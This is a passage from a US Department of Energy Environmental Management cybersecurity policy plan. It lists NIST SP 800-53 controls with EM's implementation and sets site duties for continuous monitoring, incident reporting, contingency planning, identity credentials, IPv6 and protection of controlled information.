The information system uses multifactorauthentication for network access to non-privileged accounts.
12.IR-3 0
Incident Response Testingand Exercises
The organization tests and/or exercises theincident response capability for theinformation system [Assignment:organization-defined frequency] using[Assignment: organization-defined testsand/or exercises] to determine the incidentresponse effectiveness and documents theresults.
13.IR-4 0 a Incident Handling
The organization: Implements an incidenthandling capability for security incidents thatincludes preparation, detection and analysis,containment, eradication, and recovery;
14. IR-6 0 b Incident ReportingThe organization: Reports security incidentinformation to [Assignment: organization-defined authorities].
15.MA-2 0 d Controlled Maintenance
The organization sanitizes equipment toremove all information from associated mediaprior to removal from organizational facilitiesfor off-site maintenance or repairs; and
16. MP-5 4 Media Transport
The information system implementscryptographic mechanisms to protect theconfidentiality and integrity of informationstored on digital media during transportoutside of controlled areas.
17.PL-4 0 b Rules of Behavior
The organization: Receives a signedacknowledgment from such individuals,indicating that they have read, understand,and agree to abide by the rules of behavior,before authorizing access to information andthe information system;
18. SA-8 0Security Engineering
Principles
The organization applies information systemsecurity engineering principles in thespecification, design, development,implementation, and modification of theinformation system.
19.SC-28
Protection of Informationat Rest
The information system protects the[Selection (one or more): confidentiality;
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
20 of 266
Cntl.#
En
ha
nce
me
nt
## - Control Name NIST SP 800-53 Control Requirements
integrity] of [Assignment: organization-defined information at rest].
Program Management Controls
The information security program management (PM) controls described in this sectioncomplement the security controls in Appendix A and focus on the organization-wideinformation security requirements that are independent of any particular informationsystem and are essential for managing information security programs.
Cntl. #
En
ha
nce
me
nt
#
# Control NameNIST SP 800-53 PM Control
RequirementsEM Implementation
PM-1 0 aInformation
SecurityProgram Plan
The organization develops anddisseminates an organization-wideinformation security program plan that:- Provides an overview of therequirements for the security programand a description of the securityprogram management controls andcommon controls in place or plannedfor meeting those requirements; -Provides sufficient information aboutthe program management controls andcommon controls (includingspecification of parameters for anyassignment and selection operationseither explicitly or by reference) toenable an implementation that isunambiguously compliant with theintent of the plan and a determinationof the risk to be incurred if the plan isimplemented as intended;- Includesroles, responsibilities, managementcommitment, coordination amongorganizational entities, andcompliance;- Is approved by a senior official withresponsibility and accountability for therisk being incurred to organizationaloperations (including mission,functions, image, and reputation),
The RMAIP serves asthe InformationSecurity Program Planfor EM. The RMAIPprovides an overviewof the requirementsfor the EM enterprise,addresses therequired programmanagement controlsand roles andresponsibilities thatenable the program,and is approved by theEM Senior Advisor forthe Office ofEnvironmentalManagement.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
21 of 266
Cntl. #
En
ha
nce
me
nt
#
# Control NameNIST SP 800-53 PM Control
RequirementsEM Implementation
individuals, other organizations, andthe Nation;
PM-1 0 bInformation
SecurityProgram Plan
The organization reviews theorganization-wide information securityprogram plan annually
The RMAIP is reviewedannually by the EM HQstaff.
PM-1 0 cInformation
SecurityProgram Plan
The organization revises the plan toaddress organizational changes andproblems identified during planimplementation or security controlassessments.
EM HQ ensures thatthe RMAIP is updatedper any organizationalchanges.
PM-2 0
SeniorInformation
SecurityOfficer
The organization appoints a seniorinformation security officer with themission and resources to coordinate,develop, implement, and maintain anorganization-wide information securityprogram.
EM HQ has a CyberSecurity ProgramManager (CSPM) forthe enterprise. Eachsite has an appointedAODR for local cybersecurityresponsibilities.
PM-3 0 aInformation
SecurityResources
The organization ensures that allcapital planning and investmentrequests include the resources neededto implement the information securityprogram and documents all exceptionsto this requirement.
Capital Planning andInvestment Control(CPIC) activities arecoordinated at EM HQamong the respectivegroups responsible forresource identification.
PM-3 0 bInformation
SecurityResources
The organization employs a business
case/Exhibit 300/Exhibit 53 to recordthe resources required.
The EM HQ CPIC/EAteam has theresponsibility ofdeveloping andmaintaining cybersecurity Exhibit53/300s.
PM-3 0 cInformation
SecurityResources
The organization ensures thatinformation security resources areavailable for expenditure as planned.
The EM HQ MIPPTeam is established toprovide additionalsecurity resources toEM sites. An annualbudget is approvedand available forexpenditure asplanned.
PM-4 0
Plan of Actionand
MilestonesProcess
The organization implements a processfor ensuring that plans of action andmilestones for the security programand the associated organizationalinformation systems are maintainedand document the remedialinformation security actions to mitigate
EM has implementedRPM for enterpriseconsolidation ofPOA&Ms.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
22 of 266
Cntl. #
En
ha
nce
me
nt
#
# Control NameNIST SP 800-53 PM Control
RequirementsEM Implementation
risk to organizational operations andassets, individuals, other organizations,and the Nation.
PM-5 0Information
SystemInventory
The organization develops andmaintains an inventory of itsinformation systems.
System inventories aremaintained locally ateach site. In addition,Tenable SecuritySystem contains acentral database forthis information.
PM-6 0
InformationSecurity
Measures ofPerformance
The organization develops, monitors,and reports on the results ofinformation security measures ofperformance.
Cyber securityperformance metricsare addressed for theenterprise in theRMAIP. An EM cyberdashboard has beendeveloped for trackingsecurity measures ofperformance. Siteshave localperformance metricsimplemented.
PM-7 0Enterprise
Architecture
The organization develops anenterprise architecture withconsideration for information securityand the resulting risk to organizationaloperations, organizational assets,individuals, other organizations, andthe Nation.
The EnterpriseArchitecture isaddressed through theEM HQ CPIC/EA team.Coordinate occursbetween the EM HQcyber security teamand the CPIC/EA team.
PM-8 0Critical
InfrastructurePlan
The organization addresses informationsecurity issues in the development,documentation, and updating of acritical infrastructure and key resourcesprotection plan.
It has beendetermined that EMhas no criticalinfrastructure.
PM-9 0 aRisk
ManagementStrategy
The organization develops acomprehensive strategy to manage riskto organizational operations andassets, individuals, other organizations,and the Nation associated with theoperation and use of informationsystems
The RMAIP serves asthe risk managementstrategy for the EMenterprise.
PM-9 0 bRisk
ManagementStrategy
The organization implements thatstrategy consistently across theorganization.
The RMAIP serves asthe risk managementstrategy for the EMenterprise.
PM-10 0 aSecurity
AuthorizationProcess
The organization manages (i.e.,documents, tracks, and reports) thesecurity state of organizational
The EM ContinuousMonitoring Programserves as the primary
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
23 of 266
Cntl. #
En
ha
nce
me
nt
#
# Control NameNIST SP 800-53 PM Control
RequirementsEM Implementation
information systems through securityauthorization processes.
component of thesecurity authorizationprocess.
PM-10 0 bSecurity
AuthorizationProcess
The organization designates individualsto fulfill specific roles andresponsibilities within theorganizational risk managementprocess.
EM HQ and each sitehave designated cybersecurity rolesresponsibilities tofacilitate the securityauthorization process.
PM-10 0 cSecurity
AuthorizationProcess
The organization fully integrates thesecurity authorization processes intoan organization-wide risk managementprogram.
EM HQ has developedthe RMAIP to integratesecurity authorizationof systems into anenterprise riskmanagement program.
PM-11 0 a
Mission/BusinessProcess
Definition
The organization definesmission/business processes withconsideration for information securityand the resulting risk to organizationaloperations, organizational assets,individuals, other organizations, andthe Nation
Mission/businessprocess definitionaddressed through theRMAIP and each siteconsiders risk from amission/businessprocess perspectivelocally through riskassessments. Eachsite must conduct aBusiness ImpactAssessment for their ITsystems.
PM-11 0 b
Mission/BusinessProcess
Definition
The organization determinesinformation protection needs arisingfrom the defined mission/businessprocesses and revises the processes asnecessary, until an achievable set ofprotection needs is obtained.
EM HQ has acquired anumber of enterprisesecurity solutions thatare implemented atEM sites. Thisprogram procuressolutions based uponthreats to the EMmission and datasecurity.
EM Central Repository, eGov Risk Portfolio Manager (eGovRPM)
EM sites are to use the EM central repository and eGov RPM for IT and cyber securitydocumentation. The eGov RPM repository will serve as the “institutional memory” forEM sites, computer operational personnel, and will allow the CM team to assist the sites,
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
24 of 266
make operational recommendations, and gather report data for DOE and OMB. EM sitesmust evaluate their documentation for needed changes as a result to a major change to thesystem or guidance and update these changes to eGov RPM at least annually.
The ISSM or ISSO are responsible for ensuring that eGov RPM documents are loadedand updated in a timely manner for each accreditation boundary. eGov RPM trainingwill be provided by the CM team personnel at the request of each site or as required.
eGov RPM must be used by the CM team to provide preliminary security statusinformation prior to an on-site assessment. It is important that this documentation beup-to-date to shorten the on-site assessment time, the impact to IT personnel, and foraccurate reporting.
All sites must use eGov RPM to create their SSPs and upload the appropriateaccreditation boundary certification and Contingency Plan (CP), Incident Response (IRP)Plan, Configuration Management Plan (CMP), other audit artifacts, and trainingdocumentation into the EM eGov RPM central repository. This must be accomplished atleast annually, after review and upon updating or modification of the boundary or systemdocumentation.
EM CM Team Responsibilities for Working with EM Sites
The EM CM effort is viewed as a partnership among the EM CSPM, EM federal sites,and EM contractors. Each of these groups has specific tasks that must be accomplishedunder an effective CM process.
As part of the CM process, site assessment and assistance visits must be conductedannually by an independent party for each approved boundary. In the past, ITsystems/boundaries underwent certification testing, security assessment review and, ifapproved, accreditation. Under NIST SP 800-37 guidance, C&A is no longer used forexisting systems; the current requirement is for an ATO to be issued by the AO as a resultof CM requirements. Unless a new system is developed or major changes/modificationsoccur, as determined by the AO, an ST&E will no longer be performed every three years.Based on this change in philosophy and the emphasis on CM, the EM process willmigrate to a dependence on site assessment visits. Based on the assessment outcome,which will consist of several CM activities, the AO may be advised to renew or re-authorize the system/boundary. For these reasons the HQ EM CSPM will have input tofee determination.
The EM CM team will assist with the CM effort from an enterprise perspective. The CMteam will support the sites by a constant review and update of documentation throughoutthe life-cycle of the system and then concentrate efforts in identifying weaknesses andcorrective actions. The CM team members will continue to assist in fixingdocumentation as required and offering solutions that are acceptable for the mitigation ofdiscovered weaknesses. The EM CM team will ensure that one-third of the NISTmission-adjusted minimum security controls are tested for acceptable levels of residual
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
25 of 266
risk each year in such a manner that, at a minimum, all security controls arereviewed/tested every three years. The EM CM team will provide an independent,annual continuous monitoring assessment at each site. These on-site assessments willevaluate the site’s NIST mission-adjusted minimum security controls for acceptablelevels of residual risk in such a manner that, at a minimum, all security controls arereviewed/tested every three years. After the CM assessment, the CM team will produce aCM Security Assessment Report for the AO with a recommendation for reauthorizationstatus.
The CM team will lead and facilitate the testing of plans (e.g., contingency, incidentresponse) and assist in the validation of POA&M actions in order to verify and close thePOA&M item. Leveraging the vulnerability management tool deployment for risk-basedauditing against the functional baseline configurations of the sites will allow EM to reportnear real-time risk management conformance in a timely fashion to requests forinformation from, for example, the DOE Office of the Chief Information Officer orOMB. The CM team has developed the policy controls statements for all the NISTfamilies (e.g., AC-1, AT-1). The sites may use these policy statements to answer thefamily policy controls. Based on the cooperation of the contractor during theseassessments, the EM CSPM will have the ability to give input to fee determination andnegatively (or positively) impact fee, if warranted.
EM Sites Continuous Monitoring Responsibilities
EM sites are responsible for moving from a three-year based C&A posture to a CMprocess within 60 days of incorporation within a contract. Sites are to continually updatetheir cyber security programs based on NIST 800-37. Moving to a more robust CMprocess will reduce the cost of ATO, produce better cyber security, increase productivity,and render IT services more effective.
All EM government-owned and government-owned contractor-operated systemsexperience frequent changes whether to the hardware, software, organizationalenvironments, operational procedures/requirements, or changes in threat levels/riskassessment levels. Government- and contractor-operated systems must be able torespond to these daily near real-time emerging threats and continuous changes to theirinformation systems by using CM.
Site infrastructures are susceptible to both accidental and malicious changes that cancause a system to become vulnerable. CM can thwart many attacks, prevent the rapidand deep penetration into a network that sophisticated attacks are capable of, and detectvulnerabilities introduced into the infrastructure via changes or due to technologicalevolution, prior to being actively exploited.
In todays near real-time attack environment of sophisticated hackers, not all attacks canbe successfully prevented. Emphasis is now being placed on protection through theimplementation of more robust security controls and continuously monitoring the
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
26 of 266
operation of security controls to provide early detection, containment, and successfuleradication of any intrusion or successful attack.
All EM sites must use the latest version of NIST Security Controls (see Appendix A –NIST SP 800-53 Rev 4, Security Controls and Guidance for the current version).Appendix B – NSS Security Controls are to be used in performing CM evaluations onNSS. Appendices A and B provide EM supplemental guidance for each control withexamples of what controls a site may choose to adopt. eGov RPM contains the newcontrols and will automatically select the baseline control suite for tailoring based on thecategorization process in eGov RPM.
EM sites are responsible for the following tasks included within CM:
1. Instituting a CM plan that will permit an annual reauthorization to operate by theAO of the site’s accreditation boundaries based on the CM of the mission-adjusted minimum baseline security controls and the controls’ effectiveness toaddress evolving threats and attacks.
2. Coordinating with the EM CSPM to determine the appropriate mission-adjustedminimum security controls baseline and the accreditation boundary’s acceptablelevel of risk.
3. Assisting the CM assessment team in its annual assessment of the system’smission-adjusted minimum security controls.
4. Coordinating and fully participating in annual EM CM team site assistance visitsand all activities that are associated with the CM visit.
5. Performing an Organization Impact Analysis/BIA review and updating itannually.
6. Maintaining an up-to-date mission-adjusted minimum controls security baselineconfiguration for all major components within the accreditation boundary (e.g.,personal computers, servers, firewalls, intrusion detection systems). All thesebaselines must meet the NIST guidelines for such equipment. The EMVulnerability Management tool must be used to test the equipment forconformance.
7. Performing CM on the remaining mission-adjusted minimum security controlsbaseline not tested by the EM CM Team or other independent assessors.
8. Proactively adjusting, modifying, or implementing additional security controls toallow the system to remain at the same level of risk as when it was last authorizedand updating the SSP accordingly.
9. Recording CM assessment-discovered weaknesses that require further correctiveactions, as determined by the AO. These must be recorded as site, system, orprogram POA&Ms with corrective measures/timeline identified. Correctiveactions, if accomplished in 90 days or less, can be tracked by the site; actions thattake more than 90 days to complete must establish a POA&M.
10. Updating all CM assessments, POA&M information, SSP, CP, IR, and othersecurity documents as changes to the CM process are performed and entered intoeGov RPM by the ISSO (or his/her designee).
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
27 of 266
11. Preparing a quarterly report (by the ISSM or ISSO) for the AO or AODR on thesecurity controls status effectiveness. This report must include any new proposedPOA&M items or major changes/modifications within the accreditation boundary.This should be a high-level report and should not be more than three pages.
12. Forwarding (by the AODR) a copy of the ATO to the EM CSPM after theauthorization decision is reached.
13. Reviewing, analyzing, testing, and approving all configuration changes through aconfiguration control board; these configuration management program activitiesmust be performed by the sites. All these changes must be analyzed and tested forsecurity impact. These approved changes must be made to mission-adjustedminimum security controls and the baseline configuration documentation must beupdated.
14. Mitigating phishing attacks, which continue to be the most effective means for anintruder to gain a foothold into an IT system. EM sites must take actions tomitigate phishing attacks and to strengthen the weak link—the user—throughcontinuous training. Conducting annual training is no longer sufficient toeffectively combat phishing attacks. The EM Phishing server is available andmust be used on a regular basis to conduct phishing exercises on a site’s userbase. Measurement of effectiveness will then be available via the statisticscaptured by the server and made available to the site.
15. Providing incident response training and testing annually for both users andsystem security personnel.
16. Identifying, mitigating, categorizing, and reporting all cyber security incidentsinvolving federal information or federal information systems, including privacybreaches, under DOE or DOE contractor control, to the DOE JC3, in accordancewith JC3 procedures and guidance.
17. Reporting cyber security incidents involving national security informationsystems to JC3, in accordance with the requirements in DOE M 470.4B, chg.2Safeguards and Security Program.
18. Testing all accreditation boundaries with a contingency plan annually, at aminimum.
19. Developing the contractual fee determination metrics (by the site’s CO) set forthin Appendix D, and ensuring these metrics are used as a guide to develop sitespecific metrics to affect fee in all EM site management and operating M&O,service, and subcontractor contracts.
20. Addressing program management (PM) -6, 8, and 11 controls in the SSP.21. Ensuring and monitoring contractor implementation of cyber security
requirements as directed in the Contractors’ Requirements Document (CRD) ofDOE Cyber Security Management Order, DOE O 205.1B, Chg.2. This must beaccomplished by the Program/Site Offices in conjunction with the COs.
22. Signing the ATO by the AO. At the end of the CM year the accumulation of scanresults, verified data documents, updated RA, and POA&Ms will allow the AO tomake a risk-based decision on the system’s annual authorization to operate. TheCM year begins the day the ATO is signed.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
28 of 266
Inherited Control Guidance
EM sites may elect to employ a set of security controls that can be inherited by othersystems. The approved and tested inherited controls will be documented in the SSP ofthe system inheriting the controls. The AO and AODR must approve the inheritablecontrols selection. The inherited controls may be inherited from any accreditationboundary within the site. If a common controls implementation strategy is utilized, thecommon controls must undergo an independent assessment and be authorized by the AO.Inheritable controls are subject to independent assessment, authorization, and CM asoutlined in NIST SP 800-37. Inheritable controls are also subject to the “OngoingAuthorization” and “Continuous Monitoring Principles and Procedures” discussed above.
AO’s Annual Reauthorization Responsibilities
OMB Circular A-130, Appendix III, Federal Information Systems must (1) obtain anATO in writing and (2) be reauthorized on a CM basis of security controls, and based onthe effectiveness of CM efforts.
The AO for a system/accreditation boundary reviews a system’s CM package to make arisk-based decision on the reauthorization of the system. This CM package includes, at aminimum:
A BIA, An RA, A SSP, The CM team’s Security Status Assessment Report, The Site’s CM scan results, Incident response logs, intrusions, successful attacks or evolving threats, as
appropriate; and Quarterly AO security briefings by ISSM/ISSO.
National Security Systems
EM NSS will be guided by these key CNSS documents/instructions:
CNSS 42 CNSS 26 CNSSI-1253 CNSSI -1199
EM’s NSS tend to be either networked or stand-alone configurations. The stand-alonesystems are eligible for “type” certifications. The type authorization is used whensystems have the same configurations in hardware, software, and applications. In thisinstance, a few systems may be tested at random to determine the reauthorization of all
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
29 of 266
systems of that type. If sites have networked systems and these have the same hardware,software, and application configurations, then these systems may also use typecertification.
NSS boundaries must use the template in Appendix B – NSS Security Controls toperform CM. These controls conform to the CNSS 1253 requirements. Appendix Bidentifies the baseline security controls for NSS systems based on characterization. Thecontrols are designated as either stand-alone or networked. This baseline can be tailoredbased on the site’s risk profile. Values assigned to controls within CNSS 1253 may alsobe tailored based on the site’s risk profile. Any tailoring must be approved by the AOthrough the signing of the security plan and by issuing an ATO. Sites should make everyattempt to adopt the CNSS 1253 values, if at all possible, and especially if they intend tointerconnect to other NSS.
All NSS EM CM team assessments will result in a General Status Assessment Report thatwill be put into eGov RPM, but without any POA&M results. All POA&M results mustbe stored on the NSS and available only to cleared and qualified personnel. All site-levelCM scans must also be stored on the NSS and available only to cleared and qualifiedpersonnel.
All NSS systems must use diskless technology, or lock the central processing unit (CPU)and storage media in a manner that prevents users from having physical access to either,and to prevent physical access to universal serial bus (USB) ports. The exception may bea stand-alone workstation where these requirements may not be cost effective. In thiscase a waiver must be requested from and be approved by the EM HQ CSPM. Allsystems must use port locking software to manage access to USB ports to only authorizedconnections and the BIOS must be set to only boot from the C drive; any exceptions mustbe documented in the SSP.
Federal Information Systems Management Act of 2002
FISMA reports must be submitted to the OCIO on a quarterly basis. In this regard, EMHQ will issue data calls issued to sites for information for quarterly reports as well as toobtain information for other reports. Sites need to ensure that information is provided ona timely basis so that all due dates can be met. EM intends to use enterprise-deployedtools to respond to FISMA reporting requirements. When possible, data contained in theEM central repository will be used to respond to the Department of Homeland Security(DHS). If data is lacking, then a data call will be conducted.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
30 of 266
Incident Response
The near-real-time CM requirements will provide rapid unauthorized actions detection,analysis, and lead to more effective incident response practices and procedures. NIST SP800-61, Computer Security Incident Response Guide, requires EM sites to provide astructured and documented approach to the following minimum incident types:
Denial of Service Malicious code Root Compromise User Compromise Unauthorized access Inappropriate usage Multiple components Release of personally identifiable information (PII) in the public domain Observed activity that may result in future intrusions and appears to be of a
reconnaissance nature, out of the ordinary
EM HQ Mission Information Protection Program (MIPP)Support and Participation
The EM HQ MIPP team is dedicated to the continuous improvement of informationassurance and cyber security throughout the DOE EM organization. The team uses thelatest methodologies in analytics and monitoring; deploys state-of-the-art cyber securitytechnology to analyze and defend against attacks; provides oversight and assessments ofEM sites’ cyber security programs; and further enhances the MIPP security through siteassistance, education, and training. The EM HQ MIPP team also assists EM sites inmaturing their cyber security programs by providing guidance, expertise, enterprisesolutions, and leadership in safeguarding MIPP information and assets.
From an EM enterprise perspective, a critical metric to monitor is the time taken to patcha critical vulnerability. Critical vulnerabilities exist in operating systems and inapplications, which are often overlooked. Benchmarking this process would bebeneficial in determining risk throughout the enterprise. Deploying necessary patches isstill one of the most effective means of protection for a system. While patching does notmake systems impervious to attack, it raises the bar, making attacks more difficult andeasier to detect as a result. The MIPP team will monitor the progress each site makes inpatching critical vulnerabilities and assist when necessary.
As part of the CM strategy for the EM enterprise, the MIPP team will facilitate thesharing of information among EM sites and provide a means of central analysis for thedetection of malicious activity in a near-real-time mode utilizing the enterprise full-packet capture capability to perform analysis for known perpetrators and undiscoveredperpetrators. In addition, using benchmarking and monitoring metrics created based on
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
31 of 266
the use of the Headquarters Security System (HQSS) tool suite, MIPP team members willbe able to assist sites in mitigating vulnerabilities that are discovered. The CM team willensure that a consistent level of security is maintained throughout EM.
EM has deployed a full-packet analysis capability at most of its sites. This capability isan invaluable asset to the CM process and provides an ability to determine malicious vs.suspicious activity in near real-time. Based on evolving known threats, EM has thecapability to determine if the known threats are active within the enterprise. EM siteshave the capability to identify co-opted systems and complete an accurate damageassessment. This capability will continue to be enhanced as new technology enables EMto detect and identify malicious activity. Daily analysis will be conducted, based onindicators from various sources, in an effort to detect and determine malicious activity.The MIPP team will look for ways to use this capability to enhance the CM process. Inaddition to known threats, analysis will be performed using heuristic tools to detectmalicious activity that is yet unknown to the cyber security community, providing EMwith a more proactive approach to provide new intelligence to the enterprise. Sitepersonnel have the ability to use this tool in conducting local investigations, which areeither specific to the site or due to malicious outsider activity.
CM requires the collaboration among program, Departmental, and outside entities (e.g.,SANS, Carnegie Mellon CIRT, etc.) concerning security incidents. The sharing ofincident data is a valuable tool for the prevention of successful attacks to a system. Onlythrough the real-time sharing of attack information can one expect to find an attack inprogress or to prevent a similar attack from happening. As the threat evolves, havingactionable information concerning the threat allows the threat to be mitigated and ifsuccessful, contained and eradicated. If users don’t know how the malware operates, it isimpossible to protect, contain, or eradicate. The real time sharing of information is theearly warning of a serious threat. With this information, it is possible to plot thepropagation of many attacks on a worldwide scale. One can see the rate of propagation,success rate, and therefore understand the critical window available for mitigation inorder to prevent a successful attack. The MIPP team will monitor intrusion sets based oninformation streams made available from this collaborative effort and will shareinformation gained within EM.
Sites are responsible to confirm and report all intrusions, intrusion attempts, suspiciousactivity, and incidents to JC3. The MIPP team can assist in detection, but only sites canvalidate, contain, and eradicate an intrusion. Intrusions are going to occur, 100%prevention is not possible, so reporting of incident information in a timely manner isinvaluable.
Contingency Planning
Each EM site is responsible for planning, documenting procedures, and then conductingan annual IT contingency exercise. These exercises should include realistic scenariosfound in past or anticipated system malfunctions.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
32 of 266
Individual sites must conduct a BIA to determine the maximum tolerable downtime(MTD), Recovery Time Objective (RTO) and Recovery Point Objective (RPO). Thisexercise must include the sites senior managers—contractor and federal, functioning areaPM, business leads, and other stakeholders to ensure that realistic MTD, RTO, RPO andsystem restoration priority meet the mission’s MTD requirements. The BIA must bereviewed and updated annually to ensure it meets mission, security and/or regulatoryrequirements. The BIA is an exercise performed by the business line to determine theimpact of a network failure to the business and site mission. IT staff cannot make theseassessments, although they can play a support role to determine restoration priorities andsolutions to meet these priorities.
The RE, AODR, and site program managers must jointly agree on changes and levels inthe BIA.
Contractor Requirements, System Acquisition and Services
Site Managers must ensure that Contracting Officers are instructed to incorporate thisRMAIP into site/facility management contracts and service contracts, as appropriate.
A site Contracting Officer must implement, verify and monitor the EM RMAIP cybersecurity clauses within their contract vehicles/documents (see Appendix D – EMContractor Requirements).
All hardware and software procured to support the EM cyber security requirements mustcomply with all federal statutes, policy, presidential directives and other guidance.
Application software purchased for significant deployment must be HSPD-12compliant and must be able to operate in conformance with NIST 800-53 (asmodified) that govern the secure operation of applications, (e.g., the applicationmust time out after a designated time of inactivity).
All hardware purchased must be capable of IPv6, including diagnostic toolspurchased for current and future use.
ENERGY STAR® equipment must be procured and green IT solutions must beconsidered for future deployments, (e.g., thin client, VMware, cloud technology,hot and cold lane configurations in server rooms)
Supply Chain Risk Management
When purchasing software and hardware for deployment in government-owned systemsand systems that will be processing government data, supply chain should be managedbased on risk. Sites must consider supply chain risks when purchasing components usedin NSS and any unclassified systems categorized as High Impact, in accordance withFIPS 199. Supply chain risk management must be considered when procuring IT. Whensoftware and hardware is purchased for deployment in NSS, consideration should be
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
33 of 266
given as to whether the supplier should be made aware of the intended implementation.Sites should update their awareness training to cover supply chain concerns.
All IT parts and components are not manufactured within the United States and the originis difficult to determine. For this reason, sites must perform a criticality analysis, used inconjunction with the sites BIA, to determine a priority for supply chain concerns. Athreat and risk assessment must be conducted and the country of origin must beconsidered when purchases are made. Products should be evaluated for supply chainconcerns and operations security (OPSEC) mitigation methodologies should be usedbased on the evaluation and determined need.
Large sites have the ability to discuss supply chain issues with their sitecounterintelligence (CI) contact and should check with their CI contact prior to any majorpurchase. Smaller sites that do not have a CI contact may use the EM MIPP team foradvice on purchases and supply chain concerns. The MIPP team has access to CIinformation and can supply information that can be used in the threat and riskassessment.
DOE’s Enhanced Cyber Security Services (DEX)
All EM sites are to participate in the DEX program. The EM CSPM will determine ifparticipation is not justified and in the best interest of the government on a case-by-casebasis.
Mobile Device Guidelines for Foreign Travel
All EM-owned data stored on laptops must be encrypted while at rest and in transit withFIPS 140-2 certified encryption modules. Mobile devices and removable media must beprotected in accordance with site procedures.
Use of all mobile devices is subject to the Department’s Safe Passage Program, or similarprogram.
All mobile devices must be sanitized of data and restored to the mission-adjustedminimum security baselines upon return from foreign travel. This must be accomplishedprior to connecting the device to or accessing DOE networks.
Foreign Nationals
The ISSM must implement site-level procedures to comply with DOE Order 142.3AUnclassified Foreign Visits and Assignments Program, October 14, 2010.
Foreign nationals must not be assigned or granted system administrator privileges on EMsystems. Foreign nationals will be granted access to systems only on a need to know orjob function basis. The EM CSPM can be requested to grant an exception to this
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
34 of 266
requirement in situations of operational necessity. DOE Order 142.3Arequires a securityplan for the visit/assignment and IT security must be a component addressed in the plan.
HSPD-12 Requirements and Projected Milestones
All EM sites must comply with HSPD-12 requirements and OMB memorandum (M11-11) by instituting the following:
All new systems under development must be enabled to use personal identityverification (PIV) credentials in accordance with DOE O 206.2 Identity,Credential, and Access Management, and NIST SP 800-76, Biometric DataSpecifications for Personal Identity Verification guidance, prior to theirauthorization to operate by the AO.
All existing physical and unclassified logical access control systems must use PIVcredentials for authorization. This must be accomplished prior to the sites usingdevelopment or technology refresh funds to complete other activities.
All procurement of services and products for facility or system access controlsmust be consistent with HSPD-12 and the Federal Acquisition Regulation.
OMB memorandum 06-18 (Acquisition of Products or Services forImplementation of HSPD-12) requires that organizations acquire products andservices that are compliant with federal policy and standards, and supporttechnical specifications.
Organizations must accept electronically-verified PIV credentials issued by otheragencies or organizations.
All authentications to EM IT systems must be accomplished using two factors byMay 31, 2014. Authentication by user ID and password is no longer allowed afterthis date.
EM sites and HQ must develop a plan for PIV that meets the content found in theFederal CIO Council’s, “Federal Identity, Credential and Access Roadmap andImplementation Guidance” (www.idmanagement.gov).
IPv6 Requirements and Projected Milestones
EM sites and HQ were instructed to commence the development of a plan to upgradepublic and external facing servers/services (this includes web, email, domain namesystem (DNS), Internet service provider (ISP) services and other external-facing services)to operationally meet IPv6 by the end of fiscal year (FY) 2012. In addition, sites and HQneed to upgrade client applications that communicate with public Internet servers andsupporting networks to operationally use native IPv6 by the end of FY 2014. All EMsites need to ensure that procurement of networked IT equipment meets the requirementsset forth in the USGv6 Profile and Test Program for completeness and quality of IPv6capabilities.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
35 of 266
It is also recommended that sites appoint an IPv6 Transition Manager to serve as theperson responsible for planning and leading the implementation and testing of IPv6criteria to meet the stated milestones.
Domain Name System Security Extensions (DNSSEC)
The original design of the DNS did not include security or protection mechanisms;instead it was designed to be a scalable distributed system. DNSSEC attempts to addsecurity features while maintaining backwards compatibility.
It is strongly recommended that sites implement the DNSSEC, NIST SP 800-71 forsecuring certain kinds of information provided by the DNS as used on IP networks.DNSSEC is a set of extensions to DNS that provide to DNS clients (resolvers) originauthentication of DNS data, authenticated denial of existence and data integrity, but notavailability or confidentiality.
Industrial Control Systems
All EM sites that utilize Industrial Control Systems (ICS) must use NIST 800-37, NIST800-53, and NIST 800-82 as guidelines for evaluating ICS systems. The EM CM team,in accordance with the principles outlined in NIST 800-82, must evaluate sites thatpossess ICS. ICS are considered IT systems and require ATO and are held to the samerules as information processing systems. ICS systems control processes and thereforerequire scheduling around those processes to be able to accomplish many of theprocedures required by security controls. As a result, ICS controls must be tailoredaccordingly; for example, group authenticators, less frequent patch cycles, and notrequiring screen timeouts are acceptable implementations.
Wireless Information Systems
Wireless devices, services, and technologies that are integrated or connected to EMnetworks are considered part of those networks and must comply with all DOErequirements (e.g., password management, auditing, and cryptography). Wirelessdevices must use the “safe harbor” principles, U.S. Department of Commerce, July 21,2000, for protection. Wireless networks and devices must obtain an initial authorizationand then undergo CM procedures. A wireless intrusion detection system (WIDS) must bedeployed to monitor the wireless environment. The WIDS must monitor the entirebandwidth used by 802.11 technologies. To consistently and confidently monitor signals,the system must monitor the complete industrial, scientific, and medical (ISM) bandsused for the Institute of Electrical and Electronics Engineers (IEEE) 802.11, including 2.4GHz and 5 GHz. Security firmware updates and patches to wireless hardware andsoftware components must be tested and deployed in accordance with configurationmanagement procedures.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
36 of 266
Controlled Unclassified Information (CUI) Protection
CUI consists of information that may be exempt from public release (Official Use Only,(including PII), Unclassified Controlled Nuclear Information (UCNI)). CUI should beprotected while stored at rest and during transmission. FIPS 140-2 approved encryptionmust be used for the transmission of this type of information. Entrust is available fortransmission within the DOE complex. Information at rest must also be protected.Encryption is cost prohibitive and products are not currently available to enable data atrest to be easily encrypted and managed. Currently most systems use physicalprotections and network segmentation and restricted access to protect this type ofinformation. Backups of CUI must be encrypted unless solutions such as a mirrored diskare used. As technology advances, encryption at rest will eventually become feasible andaffordable and should be considered. Until then, EM sites are to take special steps toprotect SUI and to encrypt at rest with available solutions wherever possible. EM sitesare also required to develop a protection plan for CUI and update that plan annually astechnology advances and move to encryption at rest as soon as feasible. Sites mustdocument a business justification for the collection and use of PII for each applicationthat requires that PII be processed on a system. PII must be collected and processed inaccordance with applicable laws, regulations and DOE policy. Sites should reduce theuse of PII 